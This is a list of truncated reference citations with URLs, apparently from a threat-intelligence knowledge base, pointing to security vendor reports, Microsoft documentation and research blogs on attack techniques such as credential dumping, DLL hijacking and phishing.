ATT LazaruFernando M https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution
LOLBAS Mav LOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Mavinject/
Mavinject Matt Graebhttps://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
Reaqta Mav Reaqta. (20https://reaqta.com/2017/12/mavinject-microsoft-injector/
Prevailion Smith, S., https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileles
Twitter It Carr, N.. https://x.com/ItsReallyNick/status/1055321652777619457
Docker ImaDocker. (n.https://docs.docker.com/engine/reference/commandline/images/
Elastic Ma Ewing, P. https://www.elastic.co/blog/how-hunt-masquerade-ball
DOJ LazaruDepartment https://www.justice.gov/opa/press-release/file/1092091/download
FireEye APFireEye. ( https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Password_cracking
Outlook FilN. O'Bryanhttps://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/
Microsoft OMicrosoft. https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-4
Keychain SApple. (n.dhttps://developer.apple.com/documentation/security/keychain_services
Empire KeyEmpire. (2 https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/mo
OSX KeychJan Schaumhttps://www.netmeister.org/blog/keychain-passwords.html
Keychain DYana Gouren https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Dec
Cylance ReLangendorf, https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
MSDN Authe Microsoft. https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
Microsoft Microsoft. https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
Linux Kern Pomerantz,https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
Tilbury Wi Chad Tilburhttps://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniq
ired DumpiMantvydashttps://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privilege
Passcape LPasscape. (https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
Cisco SynfuGraham Holmhttps://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
Microsoft Lambert, J https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/
Microsoft Microsoft. https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-li
Microsoft MSRC. (202https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
Cyberark Reiner, S. https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-techn
Sygnia Gol Sygnia. (2 https://www.sygnia.co/golden-saml-advisory
polygot_ic Lim, M. (20https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload
SecureWork Counter Thhttps://www.secureworks.com/research/wcry-ransomware-analysis
Talos OlymMercer, W.https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
Novetta Bl Novetta Thrhttps://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/up
Mandiant Mandiant. https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
(
Kaspersky Kaspersky Lhttps://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
ActiveMal Dan Goodin. https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabot
FBI Flash The Record.https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomwa
FireEye APFireEye La https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
lsmod manKerrisk, M https://man7.org/linux/man-pages/man8/lsmod.8.html
Microsoft RMicrosoft. https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys
Microsoft Microsoft. https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers
Microsoft Microsoft. https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery
modinfo mRussell, R. https://linux.die.net/man/8/modinfo
CrowdStrike CrowdStrike https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
SECURELISTBaumgartner https://securelist.com/whos-really-spreading-through-the-bright-star/68978/
Mandiant GGlyer, C. https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf
FireEye CF Kindlund, https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-de
Klein Activ Klein, H. ( https://helgeklein.com/blog/2010/04/active-setup-explained/
paloalto T Ray, V., et https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fu
Citizenlab Scott-Railt https://citizenlab.ca/2015/12/packrat-report/
CybereasonAmit Serperhttps://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.
MalwareByt Arntz, P. ( https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
Sofacy KomDani Creus,https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
Sophos Ra SophosLabshttps://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dod
OWASP CSVAlbinowaxhttps://owasp.org/www-community/attacks/CSV_Injection
CSV Excel MIshaq Moha https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/
BleepingCoCimpanu, Chttps://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-preven
SensePost El-Sherei, https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/
Fireeye HuHamilton, Chttps://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
Kettle CSV Kettle, J. https://www.contextis.com/blog/comma-separated-vulnerabilities
Microsoft Microsoft. https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021
Microsoft Microsoft. https://technet.microsoft.com/library/security/4053440
Enigma RevNelson, M.https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee
NVisio Lab NVISO Labshttps://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/
SensePost Stalmans, Ehttps://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
Password PLawrence Ahttps://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protecte
ThreatPostSeals, T. ( https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
wailing cr Hammond,https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
C
Mandiant Mandiant. https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
(
Retwin DireRoutin, D. https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
CISA Solar CISA. (2021https://us-cert.cisa.gov/ncas/alerts/aa21-008a
AADInternaDr. Nestorihttps://o365blog.com/post/federation-vulnerability/
Microsoft Microsoft. https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed
Microsoft Microsoft. https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.ya
Microsoft Microsoft. https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-offi
Okta CrossOkta Defenhttps://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
id man pagMacKenzie,https://linux.die.net/man/1/id
groups maMacKenzie,https://linux.die.net/man/1/groups
Elastic - K Stepanic, Dhttps://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql
AnonHBGaBright, P. https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/
NEWSCASTLennon, M.https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-ope
BlackHatRoRyan, T. (2 http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-
Microsoft Microsoft. https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db8
Sophos Sn Sophos. (2 https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypas
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit
CyberArk LNaim, D.. https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise
Cybereaso Cybereasonhttps://www.cybereason.com/blog/medusalocker-ransomware
BleepingCoAbrams, L. https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-e
Microsoft Gerend, J. https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#35
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
Cisco IOS Cisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
Cisco IOS Cisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
Microsoft Hardy, T. &https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assi
ESET Invis Hromcova,https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
SANS 1 Joshua Wrihttps://www.sans.org/blog/red-team-tactics-hiding-windows-services/
SANS 2 Joshua Wrihttps://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/
Microsoft Miroshnikov https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697
Symantec W Nicolas Fal https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
Unit42 Aci Reichel, D. https://unit42.paloaltonetworks.com/acidbox-rare-malware/
CrowdstrikThomas, W.https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-uk
MehtaFastFMehta, L. https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref
MehtaFastFMehta, L. https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref
Fast Flux - Albors, Jos https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
Unit 42 OilFalcone, R.https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-governmen
McAfee VirRoccia, T. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machin
Deloitte E Torello, A. https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
National VuNational Vuhttps://nvd.nist.gov/
ACSC EmailAustralian https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/s
CISA IDN S CISA. (201 https://us-cert.cisa.gov/ncas/tips/ST05-016
Trend MicrHacquebord, https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-a
Netskope DJenko Hwong https://www.netskope.com/blog/new-phishing-attacks-exploiting-oauth-authorization-flows-part-1
Microsoft Microsoft 3https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-ba
Microsoft AMicrosoft. https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?v
Mandiant UNick Simonhttps://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse
Optiv Devi Optiv. (20 https://www.optiv.com/insights/source-zero/blog/microsoft-365-oauth-device-code-flow-and-phishing
SecureWork SecureWork https://www.secureworks.com/blog/oauths-device-code-flow-abused-in-phishing-attacks
Linux Logs Marcel. (20https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
Sucuri BIN Cid, D.. (2 https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
Microsoft Fox, C., Va https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-fo
TechNet O3Koeller, B. https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
CrowdStrikParisi, T., https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
SensePost SensePost.https://github.com/sensepost/ruler
SensePost SensePost.https://github.com/sensepost/notruler
Outlook T Soutcast. https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
MSDN Instal Microsoft. https://msdn.microsoft.com/en-us/library/50614e95.aspx
(
LOLBAS InstLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Installutil/
TrendMictrBabon, P. (https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
IAPP IAPP. (n.d. https://iapp.org/resources/article/web-beacon/
QR-campaig Jonathan Ghttps://therecord.media/phishing-campaign-used-qr-codes-to-target-energy-firm
PCMag FakKan, M. (20https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
Mr. D0x Bi mr.d0x. (20https://mrd0x.com/browser-in-the-browser-phishing-attack/
NIST Web NIST Infor https://csrc.nist.gov/glossary/term/web_bug
ProofpointProofpoint.https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-human-factor-report.pdf
Ryte Wiki Ryte Wiki. https://en.ryte.com/wiki/Tracking_Pixel
qr-phish-agTim Bedardhttps://www.proofpoint.com/us/blog/email-and-cloud-threats/cybersecurity-stop-month-qr-code-phish
ZScaler Bit ZScaler. (2 https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials
Expel AWS Brian Bahthttps://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/
Microsoft Ako-Adjei, https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide
AWS IAM Po AWS. (n.d.)https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html
Google CloGoogle Clou https://cloud.google.com/iam/docs/policies
Invictus I Invictus I https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
Microsoft Microsoft. https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
Rhino SecurSpencer Giehttps://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor
Microsoft IMicrosoft. https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors
ESET Pipe Tartare, M.https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
Unit 42 DaFalcone, R.https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targ
intezer str Ignacio Sanhttps://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/
Mandiant gSTEPHEN EC https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx
ProjectZeroForshaw, J.https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html
Enigma OuNelson, M.https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnett
Enigma MM Nelson, M.https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
AdversariesCrowdStrikhttps://www.crowdstrike.com/blog/4-ways-adversaries-hijack-dlls/
FireEye HijHarbour, Nhttps://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html
FireEye fxsHarbour, N.https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
Hexacorn DHexacorn. https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
Microsoft Microsoft. https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637
Microsoft DMicrosoft. https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfro
Microsoft Microsoft. https://msdn.microsoft.com/en-US/library/aa375365
FireEye DLLNick Harbou https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html
OWASP Bina OWASP. (201 https://www.owasp.org/index.php/Binary_planting
Mandiant Mandiant Ihttps://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware
CISA_AA21CISA. (202 https://www.cisa.gov/uscert/ncas/alerts/aa21-200b
mining_rubMaljic, T. https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems
clip_win_s Microsoft, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip
MSDN ClipMicrosoft. https://msdn.microsoft.com/en-us/library/ms649012
Operating rvrsh3ll. ( https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363
atomic-redAtomic Redhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md
baeldung Lbaeldung. (https://www.baeldung.com/linux/proc-id-maps
Polop LinuxCarlos Polohttps://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-me
MimiPenguGregal, H. https://github.com/huntergregal/mimipenguin
Picus Labs Huseyin Cahttps://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-i
Norton BotNorton. (n.https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html
Imperva DDImperva. (nhttps://www.imperva.com/learn/ddos/booters-stressers-ddosers/
Krebs-Ann Brian Kreb https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/
Krebs-BazaBrian Krebshttps://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/
Krebs-BootBrian Kreb https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
Cyberreas Dahan, A. https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-a
FoxIT Woc Dantzig, M.https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
ise Passwoise. (2019 https://www.ise.io/casestudies/password-manager-hacking/
Github KeeLee, C., Sc https://github.com/GhostPack/KeeThief
NVD CVE-2National Vuhttps://nvd.nist.gov/vuln/detail/CVE-2019-3610
Applicatio Brandon Dahttps://redcanary.com/blog/mac-application-bundles/
theevilbit Csaba Fitzl https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/
OceanLotusEddie Lee. https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-
TheEclecti hoakley. (2https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/
TheEclecti How Notarihttps://eclecticlight.co/2020/08/28/how-notarization-works/
Gallagher Gallagher, http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-website
AWS TraffiAmazon Web https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html
capture_e Cisco. (20 https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/11604
GCP PacketGoogle Clou https://cloud.google.com/vpc/docs/packet-mirroring
SpecterOpsLuke Paine.https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512
Azure Virt Microsoft. https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview
Rhino SecurSpencer Gihttps://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/
EclecticLi Howard Oakl https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/
Securelist DLadikov, A.https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/
Symantec Di Shinotsuka,http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Code_signing
Amazon S3Amazon. (2https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/
Microsoft AAmlekar, M. https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
Wired Mage Barrett, B. https://www.wired.com/story/magecart-amazon-cloud-hacks/
Google CloGoogle. (20https://cloud.google.com/storage/docs/best-practices
HIPAA JourHIPAA Jourhttps://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/
Rclone-megJustin Schohttps://redcanary.com/blog/rclone-mega-extortion/
Trend MicrTrend Micrhttps://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon
Pentestlab netbiosX. ( https://pentestlab.blog/2017/04/19/stored-credentials/
